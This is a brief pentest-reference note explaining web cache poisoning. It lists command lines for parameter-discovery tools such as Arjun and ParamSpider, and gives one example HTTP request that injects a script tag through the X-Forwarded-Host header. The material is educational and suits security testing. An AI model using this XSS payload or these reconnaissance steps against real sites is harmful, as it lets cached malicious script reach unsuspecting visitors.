Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.
Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.
# https://github.com/s0md3v/Arjun python3 arjun.py -u https://url.com --get python3 arjun.py -u https://url.com --post # https://github.com/maK-/parameth python parameth.py -u https://example.com/test.php # https://github.com/devanshbatham/ParamSpider python3 paramspider.py --domain example.com # https://github.com/s0md3v/Parth python3 parth.py -t example.com
# XSS for users accessing /en?region=uk: GET /en?region=uk HTTP/1.1 Host: innocent-website.com X-Forwarded-Host: a."><script>alert(1)</script>"